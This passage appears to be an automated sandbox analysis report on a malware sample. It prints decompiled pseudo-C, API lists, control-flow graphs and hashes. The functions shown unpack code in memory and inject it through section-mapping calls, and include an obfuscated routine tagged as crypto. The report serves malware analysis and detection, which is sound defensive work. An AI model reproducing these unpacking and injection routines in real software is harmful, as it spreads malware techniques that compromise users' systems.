												break;
											}
											_t174 =  *_t193;
											_t193 = _t193 + 8;
											asm("lodsw");
											__eflags = 0;
											if(0 != 0) {
												 *((intOrPtr*)(0)) =  *((intOrPtr*)(0)) - _t164;
												__eflags =  *((intOrPtr*)(0 +  *(_t198 - 0x48) + _t174));
											}
											asm("loop 0xffffffe9");
										}
										_pop(_t194);
										_t172 = 0;
										__eflags = 0;
										_t108 = _t198 - 4;
										 *_t108 = 0;
										 *((intOrPtr*)(_t126 + 0x98))( *(_t198 - 0xc), 0, 0, 0, 0, 0,  *((intOrPtr*)(_t194 + 0x28)) +  *(_t198 - 0x40),  *(_t198 - 0x3c), _t108, 0);
									} else {
										L51();
										_pop(_t175);
										_t172 = _t175 - 0x16ee;
										 *((intOrPtr*)(_t172 + 0x1722)) = _t172 + 0x2bbb;
										L004011C3();
										0x33(_t172 + 0x2bbb, 0x1ad);
										 *((intOrPtr*)(_t172 + 0x1747)) = _t172 + 0x2c0b;
										0x33();
									}
								}
							}
						}
					}
				}
				_t91 = 0x1474;
				_push(0x379);
			}








































                    0x0040146b
                    0x0040146f
                    0x00401474
                    0x00401477
                    0x00401479
                    0x00401482
                    0x00401484
                    0x00401484
                    0x00401487
                    0x00401487
                    0x0040148c
                    0x00000000
                    0x00000000
                    0x004017b7
                    0x004017b7
                    0x00401492
                    0x00401495
                    0x00401498
                    0x0040149c
                    0x0040149f
                    0x004014a3
                    0x004014a9
                    0x004014ac
                    0x004014ae
                    0x004014b1
                    0x004014b7
                    0x004014ba
                    0x004014c8
                    0x004014c9
                    0x004014ca
                    0x004014cc
                    0x004014d2
                    0x004014f5
                    0x004014f8
                    0x004014fb
                    0x004014fe
                    0x00401504
                    0x00401519
                    0x0040151e
                    0x00401521
                    0x00401524
                    0x0040153c
                    0x0040153e
                    0x00401541
                    0x0040155a
                    0x0040155c
                    0x00401566
                    0x0040156c
                    0x00401572
                    0x00401572
                    0x0040155a
                    0x0040153c
                    0x00401575
                    0x00401581
                    0x00401584
                    0x00401586
                    0x0040159b
                    0x004015ae
                    0x004015b1
                    0x004015b4
                    0x004015cc
                    0x004015d2
                    0x004015d5
                    0x004015ec
                    0x004015ee
                    0x004015f4
                    0x004015f9
                    0x004015fd
                    0x004015fe
                    0x004015fe
                    0x00401603
                    0x00401628
                    0x00401630
                    0x00401642
                    0x00401647
                    0x00401659
                    0x0040167e
                    0x0040168b
                    0x004016a9
                    0x004016ab
                    0x004016af
                    0x004016b0
                    0x004016b6
                    0x004016c0
                    0x004016c0
                    0x004016b8
                    0x004016b8
                    0x004016b8
                    0x004016c6
                    0x004016c7
                    0x004016cc
                    0x004016da
                    0x004016da
                    0x004016e0
                    0x004016e2
                    0x004016e7
                    0x0040174f
                    0x00401753
                    0x0040175e
                    0x0040175e
                    0x00401761
                    0x00401761
                    0x00401764
                    0x00000000
                    0x00000000
                    0x00401766
                    0x00401770
                    0x00401775
                    0x00401777
                    0x0040177c
                    0x00401788
                    0x00401788
                    0x00401788
                    0x0040178a
                    0x0040178a
                    0x0040178e
                    0x00401795
                    0x00401795
                    0x00401797
                    0x0040179a
                    0x004017aa
                    0x004016e9
                    0x004016e9
                    0x004016ee
                    0x004016ef
                    0x00401705
                    0x00401714
                    0x00401721
                    0x00401738
                    0x00401746
                    0x00401746
                    0x004016e7
                    0x004015ee
                    0x004015cc
                    0x0040159b
                    0x004014d2
                    0x004017cb
                    0x004017db

                    APIs
                    • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004014E7
                    • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401514
                    • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401537
                    • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401555
                    • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401596
                    • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004015C7
                    • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004015E9
                    Memory Dump Source
                    • Source File: 00000000.00000002.378458801.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Similarity
                    • API ID: Section$View$Create$DuplicateObject
                    • String ID:
                    • API String ID: 1546783058-0
                    • Opcode ID: 35e92747d0d6b9a951735621b21a4a40d652c97b84ba7f77340fa48fb621f182
                    • Instruction ID: 89e6db08217f17037b3c9ea992626000aec066f246d799dfcc25d33cb0bbcea7
                    • Opcode Fuzzy Hash: 35e92747d0d6b9a951735621b21a4a40d652c97b84ba7f77340fa48fb621f182
                    • Instruction Fuzzy Hash: 0151FAB5900249BFEB208F91CC89FAF7BB8EF85710F104159FA11AA2A5D7749945CB24
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00656F65 Relevance: 3.0, APIs: 2, Instructions: 41processCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 305 656f65-656f7e 306 656f80-656f82 305->306 307 656f84 306->307 308 656f89-656f95 CreateToolhelp32Snapshot 306->308 307->308 309 656fa5-656fb2 Module32First 308->309 310 656f97-656f9d 308->310 311 656fb4-656fb5 call 656c24 309->311 312 656fbb-656fc3 309->312 310->309 315 656f9f-656fa3 310->315 316 656fba 311->316 315->306 315->309 316->312
                    APIs
                    • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00656F8D
                    • Module32First.KERNEL32(00000000,00000224), ref: 00656FAD
                    Memory Dump Source
                    • Source File: 00000000.00000002.378830916.0000000000652000.00000040.00000020.00020000.00000000.sdmp, Offset: 00652000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_652000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: CreateFirstModule32SnapshotToolhelp32
                    • String ID:
                    • API String ID: 3833638111-0
                    • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                    • Instruction ID: 1e892c76302c51fb2ff11a3e02e09e3d28883aa82fabd485f9efddce86e82c09
                    • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                    • Instruction Fuzzy Hash: 58F068355007106BD7202BB5E88DAAAB6EEAF49725F500568FA42921C0DB70EC498661
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0060003C Relevance: 11.0, APIs: 4, Strings: 2, Instructions: 515memoryCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 0 60003c-600047 1 600049 0->1 2 60004c-600263 call 600a3f call 600e0f call 600d90 VirtualAlloc 0->2 1->2 17 600265-600289 call 600a69 2->17 18 60028b-600292 2->18 23 6002ce-6003c2 VirtualProtect call 600cce call 600ce7 17->23 20 6002a1-6002b0 18->20 22 6002b2-6002cc 20->22 20->23 22->20 29 6003d1-6003e0 23->29 30 6003e2-600437 call 600ce7 29->30 31 600439-6004b8 VirtualFree 29->31 30->29 33 6005f4-6005fe 31->33 34 6004be-6004cd 31->34 37 600604-60060d 33->37 38 60077f-600789 33->38 36 6004d3-6004dd 34->36 36->33 40 6004e3-600505 36->40 37->38 43 600613-600637 37->43 41 6007a6-6007b0 38->41 42 60078b-6007a3 38->42 54 600517-600520 40->54 55 600507-600515 40->55 45 6007b6-6007cb 41->45 46 60086e-6008be LoadLibraryA 41->46 42->41 44 60063e-600648 43->44 44->38 47 60064e-60065a 44->47 49 6007d2-6007d5 45->49 53 6008c7-6008f9 46->53 47->38 52 600660-60066a 47->52 50 600824-600833 49->50 51 6007d7-6007e0 49->51 60 600839-60083c 50->60 57 6007e2 51->57 58 6007e4-600822 51->58 59 60067a-600689 52->59 61 600902-60091d 53->61 62 6008fb-600901 53->62 56 600526-600547 54->56 55->56 63 60054d-600550 56->63 57->50 58->49 64 600750-60077a 59->64 65 60068f-6006b2 59->65 60->46 66 60083e-600847 60->66 62->61 67 6005e0-6005ef 63->67 68 600556-60056b 63->68 64->44 69 6006b4-6006ed 65->69 70 6006ef-6006fc 65->70 71 600849 66->71 72 60084b-60086c 66->72 67->36 74 60056d 68->74 75 60056f-60057a 68->75 69->70 76 60074b 70->76 77 6006fe-600748 70->77 71->46 72->60 74->67 78 60059b-6005bb 75->78 79 60057c-600599 75->79 76->59 77->76 84 6005bd-6005db 78->84 79->84 84->63
                    APIs
                    • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 0060024D
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.378681921.0000000000600000.00000040.00001000.00020000.00000000.sdmp, Offset: 00600000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_600000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: AllocVirtual
                    • String ID: cess$kernel32.dll
                    • API String ID: 4275171209-1230238691
                    • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                    • Instruction ID: bbbf4db3596f4485a88410cc2d3c193017e3a9667bdecbbed5112f2fd1dd1f22
                    • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                    • Instruction Fuzzy Hash: 02526974A01229DFDB64CF58C985BA9BBB1BF09304F1480E9E54DAB391DB30AE85DF14
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0040C96A Relevance: 4.6, APIs: 3, Instructions: 84COMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 274 40c96a-40c983 call 4105f7 277 40c985-40c988 274->277 278 40c99d-40c9a1 274->278 279 40ca2d-40ca2f 277->279 280 40c9a3-40c9b8 call 41065a 278->280 281 40c98d-40c98f 278->281 280->277 287 40c9ba-40c9c1 280->287 282 40c991 281->282 283 40c992-40c999 281->283 282->283 283->278 288 40ca05-40ca08 287->288 289 40c9c3-40c9d0 288->289 290 40ca0a-40ca29 288->290 293 40c9d2-40c9d5 call 41065a 289->293 294 40ca03 289->294 295 40ca2b-40ca2c 290->295 297 40c9da-40c9e0 293->297 294->288 295->279 298 40ca30-40ca45 297->298 299 40c9e2-40c9ef 297->299 298->295 302 40ca00 299->302 303 40c9f1-40c9fd 299->303 302->294 303->302
                    APIs
                    • ___initmbctable.LIBCMT ref: 0040C972
                      • Part of subcall function 004105F7: __setmbcp.LIBCMT ref: 00410602
                    • __calloc_crt.LIBCMT ref: 0040C9A7
                    Memory Dump Source
                    • Source File: 00000000.00000002.378507056.0000000000409000.00000020.00000001.01000000.00000003.sdmp, Offset: 00409000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_409000_file.jbxd
                    Similarity
                    • API ID: ___initmbctable__calloc_crt__setmbcp
                    • String ID:
                    • API String ID: 4150745854-0
                    • Opcode ID: bbed12e89968c4f6c2cbb67d26b3dfc3fbc67c745ac89b501c6bab3494cf33b4
                    • Instruction ID: ba80878632f788adcc880e20e5c52df4f94d7748c8d254a861737b16b4d9621a
                    • Opcode Fuzzy Hash: bbed12e89968c4f6c2cbb67d26b3dfc3fbc67c745ac89b501c6bab3494cf33b4
                    • Instruction Fuzzy Hash: 8B210EB3904111AAEF2197366C85B5737849B41365F35033FF891722D1DA7D9882865D
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00600E0F Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 318 600e0f-600e24 SetErrorMode * 2 319 600e26 318->319 320 600e2b-600e2c 318->320 319->320
                    APIs
                    • SetErrorMode.KERNELBASE(00000400,?,?,00600223,?,?), ref: 00600E19
                    • SetErrorMode.KERNELBASE(00000000,?,?,00600223,?,?), ref: 00600E1E
                    Memory Dump Source
                    • Source File: 00000000.00000002.378681921.0000000000600000.00000040.00001000.00020000.00000000.sdmp, Offset: 00600000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_600000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: ErrorMode
                    • String ID:
                    • API String ID: 2340568224-0
                    • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                    • Instruction ID: 5e5b7fc9be17af52c8aa1593ebc2cf7226538b4808b2ec5a12ddc81c56322646
                    • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                    • Instruction Fuzzy Hash: 08D0123114512877D7002A94DC09BCE7B1CDF05B62F008411FB0DE9180C770994046E5
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0040CE1F Relevance: 1.5, APIs: 1, Instructions: 20memoryCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 321 40ce1f-40ce41 HeapCreate 322 40ce43-40ce44 321->322 323 40ce45-40ce4e 321->323
                    APIs
                    • HeapCreate.KERNELBASE(00000000,00001000,00000000), ref: 0040CE34
                    Memory Dump Source
                    • Source File: 00000000.00000002.378507056.0000000000409000.00000020.00000001.01000000.00000003.sdmp, Offset: 00409000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_409000_file.jbxd
                    Similarity
                    • API ID: CreateHeap
                    • String ID:
                    • API String ID: 10892065-0
                    • Opcode ID: f58d1642b2d06b1893d901f714456932096660bd81b9c58e6896f47aa16a25e0
                    • Instruction ID: c4e98715908aa5aa5608ab1660a6e083fbb4bcb1d5e1bcca78ae5a112a13d87e
                    • Opcode Fuzzy Hash: f58d1642b2d06b1893d901f714456932096660bd81b9c58e6896f47aa16a25e0
                    • Instruction Fuzzy Hash: C4D0A7366543099FEB105F74BD087233BECD384395F004436B90CC61A0F574C941C648
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 004017F4 Relevance: 1.3, APIs: 1, Instructions: 51sleepCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 324 4017f4-401817 328 401825 324->328 329 40181e-401821 324->329 328->329 330 401828-40184a call 401134 Sleep call 401366 328->330 329->330 335 401859-40185f 330->335 336 40184c-401854 call 40143b 330->336 339 401865-40188e call 401134 335->339 340 40186e 335->340 336->335 340->339
                    C-Code - Quality: 43%
                    			E004017F4(void* __edi, void* __esi, void* __eflags, void* __fp0, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v8;
				void* __ebp;
				intOrPtr _t8;
				void* _t11;
				void* _t14;
				intOrPtr* _t16;
				void* _t19;
				intOrPtr* _t23;

				_t27 = __fp0;
				_t25 = __eflags;
				_t20 = __edi;
				_push(__edi);
				_push(0x182d);
				_t8 =  *_t23;
				_push(0x5d);
				E00401134(_t8, __edi, __eflags, __fp0);
				_t16 = _a4;
				Sleep(0x1388);
				_t11 = L00401366(_t19, _t25, _t16, _a8, _a12,  &_v8); // executed
				_t26 = _t11;
				if(_t11 != 0) {
					E0040143B(_t26, _t16, _t11, _v8, _a16); // executed
				}
				 *_t16(0xffffffff, 0);
				_t14 = E00401134(0x182d, _t20, _t26, _t27);
				[far dword [edi+0x5e]();
				return _t14;
			}











                    0x004017f4
                    0x004017f4
                    0x004017f4
                    0x004017fc
                    0x00401805
                    0x0040180a
                    0x0040181e
                    0x00401828
                    0x0040182d
                    0x00401835
                    0x00401843
                    0x00401848
                    0x0040184a
                    0x00401854
                    0x00401854
                    0x0040185d
                    0x00401885
                    0x00401889
                    0x0040188e

                    APIs
                    • Sleep.KERNELBASE(00001388), ref: 00401835
                      • Part of subcall function 0040143B: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004014E7
                      • Part of subcall function 0040143B: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401514
                      • Part of subcall function 0040143B: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401537
                    Memory Dump Source
                    • Source File: 00000000.00000002.378458801.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Similarity
                    • API ID: Section$CreateDuplicateObjectSleepView
                    • String ID:
                    • API String ID: 1885482327-0
                    • Opcode ID: 4833809e19ebbce1afda95b8d958c6ac0413f9150f8c520dfd08e6e3e547968f
                    • Instruction ID: df28ea85591e98f8d733e92c0a85c910368ecf21aa371a8bf2e7d42b67981e89
                    • Opcode Fuzzy Hash: 4833809e19ebbce1afda95b8d958c6ac0413f9150f8c520dfd08e6e3e547968f
                    • Instruction Fuzzy Hash: 05014F77608204E7DB017AA59C41EAA366CAB45754F20C537FA13781F1D63CCB12ABAB
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00656C24 Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 347 656c24-656c5e call 656f37 350 656c60-656c93 VirtualAlloc call 656cb1 347->350 351 656cac 347->351 353 656c98-656caa 350->353 351->351 353->351
                    APIs
                    • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 00656C75
                    Memory Dump Source
                    • Source File: 00000000.00000002.378830916.0000000000652000.00000040.00000020.00020000.00000000.sdmp, Offset: 00652000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_652000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: AllocVirtual
                    • String ID:
                    • API String ID: 4275171209-0
                    • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                    • Instruction ID: 32ec4525702671d01a75edfb2c352691e6d0173590d656ace703508c035f3c7f
                    • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                    • Instruction Fuzzy Hash: 58112B79A00208EFDB01DF98C985E99BBF5EF08351F458094F9889B362D771EA54DF84
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00401824 Relevance: 1.3, APIs: 1, Instructions: 39sleepCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 354 401824-401825 356 401828-40184a call 401134 Sleep call 401366 354->356 357 40181e-401821 354->357 362 401859-40185f 356->362 363 40184c-401854 call 40143b 356->363 357->356 366 401865-40188e call 401134 362->366 367 40186e 362->367 363->362 367->366
                    C-Code - Quality: 56%
                    			E00401824(void* __edi, void* __eflags, void* __fp0) {
				void* _t8;
				void* _t11;
				void* _t14;
				intOrPtr* _t16;
				void* _t20;
				void* _t22;

				_t27 = __fp0;
				_t25 = __eflags;
				_t21 = __edi;
				_pop(_t8);
				_t22 = 0x5d;
				E00401134(_t8, __edi, __eflags, __fp0);
				_t16 =  *((intOrPtr*)(_t22 + 8));
				Sleep(0x1388);
				_t11 = L00401366(_t20, _t25, _t16,  *((intOrPtr*)(_t22 + 0xc)),  *((intOrPtr*)(_t22 + 0x10)), _t22 - 4); // executed
				_t26 = _t11;
				if(_t11 != 0) {
					E0040143B(_t26, _t16, _t11,  *((intOrPtr*)(_t22 - 4)),  *((intOrPtr*)(_t22 + 0x14))); // executed
				}
				 *_t16(0xffffffff, 0);
				_t14 = E00401134(0x182d, _t21, _t26, _t27);
				[far dword [edi+0x5e]();
				return _t14;
			}









                    0x00401824
                    0x00401824
                    0x00401824
                    0x00401824
                    0x0040181f
                    0x00401828
                    0x0040182d
                    0x00401835
                    0x00401843
                    0x00401848
                    0x0040184a
                    0x00401854
                    0x00401854
                    0x0040185d
                    0x00401885
                    0x00401889
                    0x0040188e

                    APIs
                    • Sleep.KERNELBASE(00001388), ref: 00401835
                      • Part of subcall function 0040143B: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004014E7
                      • Part of subcall function 0040143B: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401514
                      • Part of subcall function 0040143B: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401537
                    Memory Dump Source
                    • Source File: 00000000.00000002.378458801.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Similarity
                    • API ID: Section$CreateDuplicateObjectSleepView
                    • String ID:
                    • API String ID: 1885482327-0
                    • Opcode ID: f592541f30fbcca03b96e500b31fa5f982bcaff6f64a27eb3c64f1708acf91e7
                    • Instruction ID: 6ef1ed1bf64fe5eabda647e92d7164afe002825c4aa424cea749e35a608ab800
                    • Opcode Fuzzy Hash: f592541f30fbcca03b96e500b31fa5f982bcaff6f64a27eb3c64f1708acf91e7
                    • Instruction Fuzzy Hash: 55F01277204105E7DB057AA19C41EA92629DB05355F20C937BA13B84F1C63CC712AB6B
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0040181F Relevance: 1.3, APIs: 1, Instructions: 37sleepCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 374 40181f-40184a call 401134 Sleep call 401366 380 401859-40185f 374->380 381 40184c-401854 call 40143b 374->381 384 401865-40188e call 401134 380->384 385 40186e 380->385 381->380 385->384
                    C-Code - Quality: 55%
                    			E0040181F(void* __edi, void* __eflags, void* __fp0) {
				void* _t8;
				void* _t11;
				void* _t14;
				intOrPtr* _t16;
				void* _t20;
				void* _t22;

				_t27 = __fp0;
				_t25 = __eflags;
				_t21 = __edi;
				_pop(_t22);
				E00401134(_t8, __edi, __eflags, __fp0);
				_t16 =  *((intOrPtr*)(_t22 + 8));
				Sleep(0x1388);
				_t11 = L00401366(_t20, _t25, _t16,  *((intOrPtr*)(_t22 + 0xc)),  *((intOrPtr*)(_t22 + 0x10)), _t22 - 4); // executed
				_t26 = _t11;
				if(_t11 != 0) {
					E0040143B(_t26, _t16, _t11,  *((intOrPtr*)(_t22 - 4)),  *((intOrPtr*)(_t22 + 0x14))); // executed
				}
				 *_t16(0xffffffff, 0);
				_t14 = E00401134(0x182d, _t21, _t26, _t27);
				[far dword [edi+0x5e]();
				return _t14;
			}









                    0x0040181f
                    0x0040181f
                    0x0040181f
                    0x0040181f
                    0x00401828
                    0x0040182d
                    0x00401835
                    0x00401843
                    0x00401848
                    0x0040184a
                    0x00401854
                    0x00401854
                    0x0040185d
                    0x00401885
                    0x00401889
                    0x0040188e

                    APIs
                    • Sleep.KERNELBASE(00001388), ref: 00401835
                      • Part of subcall function 0040143B: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004014E7
                      • Part of subcall function 0040143B: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401514
                      • Part of subcall function 0040143B: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401537
                    Memory Dump Source
                    • Source File: 00000000.00000002.378458801.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Similarity
                    • API ID: Section$CreateDuplicateObjectSleepView
                    • String ID:
                    • API String ID: 1885482327-0
                    • Opcode ID: 499b95e636ba847a66cd2fb4256d29b3f3f23bbd9eaf3472c39998fbc980e936
                    • Instruction ID: 22086707188f3d238c80ea2b1502365f527a58e6f5fc57b11dc43d2376d567d0
                    • Opcode Fuzzy Hash: 499b95e636ba847a66cd2fb4256d29b3f3f23bbd9eaf3472c39998fbc980e936
                    • Instruction Fuzzy Hash: 20F03077604104EBDB05BBA58C41EA93729EB05355F208537FA12B84F1CA3DC712AB2B
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Non-executed Functions

                    Function 0060092B Relevance: 3.8, Strings: 3, Instructions: 90COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.378681921.0000000000600000.00000040.00001000.00020000.00000000.sdmp, Offset: 00600000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_600000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: .$GetProcAddress.$l
                    • API String ID: 0-2784972518
                    • Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                    • Instruction ID: ca3e0dc928b3eb58f5f920a532e04de175240ee417e0ebceb62b96e15e73e0bb
                    • Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                    • Instruction Fuzzy Hash: 683137B6900609DFEB14CF99C880BAEBBF6FF48324F25504AD441A7351D771EA45CBA4
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 004021E7 Relevance: .2, Instructions: 235COMMONCrypto
                    Download Yara Rule
                    C-Code - Quality: 20%
                    			E004021E7(signed char __edx, signed int __esi, void* __eflags, void* __fp0, void* _a39, signed char _a932187529) {
				void* _v3;
				void* __edi;
				void* __ebp;
				intOrPtr _t80;
				void* _t81;
				signed char _t88;
				signed int _t93;
				signed int _t98;
				signed char _t143;
				signed char _t144;
				signed char _t145;
				void* _t150;
				signed char _t154;
				signed char _t155;
				intOrPtr _t172;
				signed char _t173;
				signed char _t178;
				signed char _t179;
				void* _t182;
				void* _t192;
				void* _t193;
				void* _t196;
				void* _t198;
				void* _t203;
				void* _t205;
				void* _t206;
				void* _t207;
				void* _t209;
				void* _t210;
				void* _t211;
				void* _t212;
				void* _t214;
				void* _t215;
				void* _t216;
				void* _t223;
				void* _t226;
				void* _t228;
				void* _t233;
				void* _t235;
				void* _t236;
				void* _t237;
				void* _t239;
				void* _t240;
				void* _t241;
				void* _t242;
				void* _t244;
				void* _t245;
				signed int _t296;
				void* _t306;
				intOrPtr* _t307;
				intOrPtr* _t308;

				_t296 = __esi;
				_t178 = __edx;
				_t307 = _t306 - 0x3c;
				_push(__esi);
				_push(_t182);
				_push(0x2224);
				_t80 =  *_t307;
				_t308 = _t307 + 4;
				_push(0x288);
				_t172 =  *_t308;
				_t81 = E00401134(_t80, _t182, __eflags, __fp0);
				asm("sbb ah, [ebx+0x5f5f5f5e]");
				asm("aam 0x2");
				_push(_t182);
				asm("aaa");
				 *(_t81 - 0x15) =  *(_t81 - 0x15) ^ _t178;
				asm("daa");
				asm("aaa");
				asm("popad");
				_t173 = _t172 -  *((intOrPtr*)((_t296 ^  *0x46) + 9));
				_t88 =  *0x9fda470c;
				asm("fiadd dword [ebp+ebx*2+0x5f]");
				_t192 = _t88;
				asm("fcomp qword [ecx-0x484a4ba9]");
				_pop(_t193);
				asm("sbb bl, [edi+0x18]");
				_t196 = ss;
				_t198 = es;
				asm("sbb al, 0x5f");
				ss = ds;
				asm("adc [edi+0x1a], ebx");
				_t203 = ss;
				_pop(_t205);
				_pop(_t206);
				_pop(_t207);
				asm("sbb al, 0x5f");
				_pop(_t209);
				_t143 = (( *((intOrPtr*)(_t192 + 0x5f)) +  *((intOrPtr*)(_t193 + 0xd)) |  *(_t196 + 0xd)) +  *((intOrPtr*)(_t198 + 0x12)) +  *((intOrPtr*)(_t203 + 0xc)) -  *((intOrPtr*)(_t205 + 0x3a)) ^  *(_t206 + 3)) -  *((intOrPtr*)(_t207 + 0x2d)) -  *((intOrPtr*)(_t209 + 0x1c));
				_pop(_t210);
				 *(_t210 + 0x31) =  *(_t210 + 0x31) ^ _t143;
				_pop(_t211);
				_t144 = _t143 -  *((intOrPtr*)(_t211 + 0x2d));
				_pop(_t212);
				 *(_t212 + 0x33) =  *(_t212 + 0x33) ^ _t144;
				_pop(_t214);
				_t145 = _t144 +  *((intOrPtr*)(_t214 + 0x1a));
				_pop(_t215);
				 *(_t215 + 0x2a) =  *(_t215 + 0x2a) ^ _t145;
				_pop(_t216);
				asm("sbb ebx, [edi+0x1a]");
				_t223 = ss;
				asm("sbb bl, [edi+0x18]");
				_t226 = ss;
				_t93 = (_t88 | 0x0000005f) - 0xffffffffcea0c600 | 0x5f;
				_t228 = es;
				asm("sbb al, 0x5f");
				ss = ds;
				asm("adc [edi+0x1a], ebx");
				_t233 = ss;
				_t150 = ((_t145 ^  *(_t216 + 3)) +  *((intOrPtr*)(_t223 + 0xd)) |  *(_t226 + 0xd)) +  *((intOrPtr*)(_t228 + 0x12)) +  *((intOrPtr*)(_t233 + 0xc));
				_pop(_t235);
				do {
					_pop(_t236);
					_pop(_t237);
					asm("sbb al, 0x5f");
					_pop(_t239);
					_t154 = (_t150 -  *((intOrPtr*)(_t235 + 0x3a)) ^  *(_t236 + 3)) -  *((intOrPtr*)(_t237 + 0x2d)) -  *((intOrPtr*)(_t239 + 0x1c));
					_pop(_t240);
					 *(_t240 + 0x31) =  *(_t240 + 0x31) ^ _t154;
					_pop(_t241);
					_t155 = _t154 -  *((intOrPtr*)(_t241 + 0x2d));
					_pop(_t242);
					 *(_t242 + 0x33) =  *(_t242 + 0x33) ^ _t155;
					_pop(_t244);
					_pop(_t245);
